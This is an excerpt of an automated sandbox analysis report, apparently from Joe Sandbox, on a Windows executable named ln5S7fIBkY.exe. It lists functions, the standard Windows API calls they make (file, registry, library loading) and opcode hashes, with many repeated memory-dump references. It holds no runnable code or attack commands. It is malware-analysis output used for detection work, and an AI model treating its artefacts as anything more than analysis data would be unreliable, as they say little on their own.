Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 122ece3e66c06ae455bd99493a5e16f46f3acc95e5bbde665d13cf9dfb12216c
Instruction ID: ff893fd080683d27dd3b5e94bf1da30195128cfff23c54bbc30ea882265df843
Opcode Fuzzy Hash: 122ece3e66c06ae455bd99493a5e16f46f3acc95e5bbde665d13cf9dfb12216c
Instruction Fuzzy Hash: DBE04876B141049BCB14CBA8DD8086E77A5A789310724457BD501B3650CA79AD50CF68

Function 00406671 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
GetProcAddress.KERNEL32(00000000,?), ref: 0040669E

Part of subcall function 00406601: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
Part of subcall function 00406601: wsprintfW.USER32 ref: 00406653
Part of subcall function 00406601: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
Instruction ID: f8cbec149f8048a337a195de8e089d72e19c2715f3a6386891d9cbb614a09016
Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
Instruction Fuzzy Hash: D3E08C326042116AD7119A709E4497B66AC9A89740307883EFD46F2181EB3A9C31AAAD

Function 00405D8D Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\ln5S7fIBkY.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15

Function 00405D68 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,0040596D,?,?,00000000,00405B43,?,?,?,?), ref: 00405D6D
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D81

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction ID: 56b75d8f9ca2641e27e40e0bc5846bc1deeaaca66535f557d4a9eea11918b9db
Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction Fuzzy Hash: 39D01272504421AFC2512738EF0C89BBF95DF543717128B35FEE9A22F0CB314C568A98

Function 0040584B Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004035B6,?,00000006,00000008,0000000A), ref: 00405851
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040585F

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction ID: 569726fefb5a692a208b00f3c4627a0038051db83374957b12f20e82e1ac62f2
Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction Fuzzy Hash: 97C08C71211501DAC7002F318F08B073A50AB20340F15883DA64AE00E0CA308024D92D

Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 5fb29c7ac6bd4be6067060594f6abdd8dc98f2d64ebda3ebf196088e56367313
Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
Opcode Fuzzy Hash: 5fb29c7ac6bd4be6067060594f6abdd8dc98f2d64ebda3ebf196088e56367313
Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D

Function 00406132 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040615B

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction ID: 5f0451bdd463ed866e2305ac1dfee878cc5b4d333075ebda4e05e47d22d2a603
Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction Fuzzy Hash: 6BE0E672110109BEDF099F50DD0AD7B371DE704304F01452EFA06D5051E6B5AD305674

Function 00405E10 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403321,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E24

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction ID: 994fac52afecd872c6575aa209eb3fbbfd601c2a51b89c6ee9ed5d101180f43c
Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction Fuzzy Hash: 93E08C3220525AABCF109F51CC04EEB3B6CEB04360F000832FD98E2040D230EA219BE4

Function 00405E3F Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032D7,000000FF,0078B6D8,?,0078B6D8,?,?,00000004,00000000), ref: 00405E53

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction ID: 720248cc98aac2988b2abacb793a2dea5f933c74ab6652834825bf215bbdf934
Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction Fuzzy Hash: 72E08C3220025AABCF109F60DC00AEB3B6CFB007E0F048432F951E3040D230EA208FE4

Function 00406104 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406192,?,00000000,?,?,: Completed,?), ref: 00406128

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: 68c61e8d1810f1ea9cab55705828a401d3ebcdae1eadef42580152fd7570d6fd
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: 4BD0123204020EBBDF11AE909D01FAB3B1DEB08350F014826FE06A80A2D776D530AB54

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f851741033878782bd382afd736986932f0f82490c74007ecaa1b2c921d2c013
Instruction ID: c073ba0ee5163cb04706f99935c2f3c73a5a9b1a05bee32f9da8622fc5c815d0
Opcode Fuzzy Hash: f851741033878782bd382afd736986932f0f82490c74007ecaa1b2c921d2c013
Instruction Fuzzy Hash: 68D01272B04100D7DB50DBE4AF4899D73A4AB84369B348577E102F11D0DAB9D9515B29

Function 0040425A Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
